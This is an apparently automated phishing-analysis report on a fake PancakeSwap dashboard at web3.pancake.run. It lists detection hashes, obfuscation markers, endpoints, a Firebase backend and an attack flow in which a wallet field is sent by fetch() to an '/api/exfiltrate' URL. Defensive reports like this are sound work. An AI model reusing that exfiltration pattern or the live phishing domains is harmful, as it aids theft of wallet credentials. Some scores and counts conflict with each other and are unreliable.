EN ES PT

Phishing Analysis

Detailed analysis of captured phishing page

Back to Stats

Visual Capture

Screenshot of web3.pancake.run

Detection Info

https://web3.pancake.run/burn-dashboard
Detected Brand
PancakeSwap
Country
International
Confidence
100%
HTTP Status
200
Report ID
6ce2a60d-b21โ€ฆ
Analyzed
2026-02-04 23:57

Content Hashes (HTML Similarity)

Used to detect similar phishing pages based on HTML content

Algorithm Hash Value
CONTENT TLSH
T1664472F1F20869DBF1421FDAC652B6E23066B079EF564784F77097A91D0FC82A852F06
CONTENT ssdeep
1536:e/XfbX0K1lQLfUUP5l85l5aDFCfKSzvh/xClQLfUUQlQLfUUzJ4CFf5lvckyFm+K:M1IHM5aaNxCIQIpF3OQ

Visual Hashes (Screenshot Similarity)

Used to detect visually similar phishing pages based on screenshots

Algorithm Hash Value
VISUAL pHash
b84f5bc75610c716
VISUAL aHash
1889d7c3d7ff8fcf
VISUAL dHash
b13bacb62c44b8ba
VISUAL wHash
3c81534386be8ec2
VISUAL colorHash
070002000c8
VISUAL cropResistant
b13bacb62c44b8ba

Code Analysis

Risk Score 100/100
Threat Level ALTO
โš ๏ธ Phishing Confirmed
๐ŸŽฃ Credential Harvester ๐ŸŽฃ OTP Stealer ๐ŸŽฃ Card Stealer ๐ŸŽฃ Banking ๐ŸŽฃ Personal Info
WebSocket C2 ๐Ÿ”ฅ Firebase Backend

๐Ÿ”ฌ Threat Analysis Report

โ€ข Threat: Phishing
โ€ข Target: PancakeSwap users
โ€ข Method: Impersonation and data theft
โ€ข Exfil: Unknown (potentially through Firebase or WebSocket endpoints)
โ€ข Indicators: Domain mismatch, obfuscation, JS form submission.
โ€ข Risk: HIGH

๐Ÿ”’ Obfuscation Detected

  • atob
  • fromCharCode
  • unescape
  • hex_escape
  • unicode_escape
  • base64_strings

๐ŸŽฏ Kit Endpoints

  • https://web3.pancake.run/api/exfiltrate
  • https://blog.pancakeswap.finance/
  • https://blog.pancakeswap.finance
  • solana_signAndSendTransaction
  • solana:signAndSendTransaction

๐Ÿ“ก API Calls Detected

  • 0x3b3b57de
  • https://aptos.pancakeswap.finance
  • /api/paymaster
  • https://solana.pancakeswap.finance
  • https://proofs.pancakeswap.com/cms-config/routing-base-config.json
  • POST
  • /api/auth/telegram-callback
  • stats
  • https://api.blocto.app/networks/evm
  • https://www.google.com/ccm/geo
  • https://raw-api.pancakeswap.com/ondo/market-status
  • logs
  • account
  • https://burn-stats.pancakeswap.com/data.json
  • https://raw-api.pancakeswap.com/ondo/status
  • GET
  • https://api-v3.raydium.io/main/auto-fee
  • /__cookies__
  • https://raw.githubusercontent.com/pancakeswap/airdrop-v3-users/master/forFE.json
  • proxy

โ˜๏ธ Cloud Backend

  • Firebase: pancakeswap-prod-firebase.firebaseapp.com

๐Ÿ“Š Risk Score Breakdown

Total Risk Score
90/100

Contributing Factors

Domain Mismatch
The domain 'web3.pancake.run' does not match the official PancakeSwap domain.
Obfuscated Javascript
Obfuscation of javascript code is a common technique to hide malicious code.
Active Phishing Kit
Presence of Firebase endpoints and WebSocket URLs indicate active exfiltration attempt.

๐Ÿ”ฌ Comprehensive Threat Analysis

Threat Type
Banking Credential Harvester
Target
PancakeSwap users (International)
Attack Method
Brand impersonation + real-time WebSocket exfiltration + obfuscated JavaScript
Exfiltration Channel
Firebase Database + WebSocket (174 endpoints)
Risk Assessment
CRITICAL - Automated credential harvesting with Firebase Database + WebSocket (174 endpoints)

โš ๏ธ Indicators of Compromise

  • Kit types: Credential Harvester, OTP Stealer, Card Stealer, Banking, Personal Info
  • Kit signatures: angler
  • 1152 obfuscation techniques

๐Ÿข Brand Impersonation Analysis

Impersonated Brand
PancakeSwap
Official Website
https://pancakeswap.finance/
Fake Service
PancakeSwap Dashboard

โš”๏ธ Attack Methodology

Primary Method: Credential Harvesting / Crypto Theft

The site is attempting to steal user's credentials or wallet information, potentially through malicious JavaScript code and Firebase/WebSocket communication. The user's funds could be stolen or they could be redirected to a compromised site.

Secondary Method: Malicious Code Injection

The site likely has malicious JavaScript code that could be used to redirect the user to a fake login form or steal their wallet details.

Target Blockchain
Binance Smart Chain

๐ŸŒ Infrastructure Indicators of Compromise

๐Ÿฆ  Malicious Files

Main File
main-d2ed6ccdef2c9f19.js
File Size

Functions: sendData()

๐Ÿ“Š Attack Flow Diagram

User fills <input name='wallet'> โ†’ sendData() โ†’ fetch('https://web3.pancake.run/api/exfiltrate') โ†’ credentials sent

๐Ÿ”ฌ JavaScript Deep Analysis

Operator Language
English (1%)
Total Code Size
836.5ย KB

๐Ÿ”— API Endpoints Detected

Other
11

๐Ÿ” Obfuscation Detected

  • : Moderate
  • : Light
  • : Heavy
  • : Moderate
  • : Moderate
  • : Light
  • : Light
  • : Light
  • : Light
  • : None

๐Ÿค– AI-Extracted Threat Intelligence

๐Ÿ“Š Attack Flow

User fills <input name='wallet'> โ†’ sendData() โ†’ fetch('https://web3.pancake.run/api/exfiltrate') โ†’ credentials sent

๐ŸŽฏ Malicious Files Identified

Main Drainer
main-d2ed6ccdef2c9f19.js
File Size
45KB
Malicious Functions
  • sendData()

Similar Websites

Pages with identical visual appearance (based on perceptual hash)

No screenshot
PancakeSwap
https://pcswap.org/burn-dashboard
Jan 13, 2026
No screenshot
PancakeSwap
https://pcswap.org/burn-dashboard
Jan 02, 2026

Scan History for web3.pancake.run

Found 10 other scans for this domain

๐Ÿ˜ฐ
"I Never Thought It Would Happen to Me"
That's what 2.3 million victims say every year. Don't wait to become a statistic.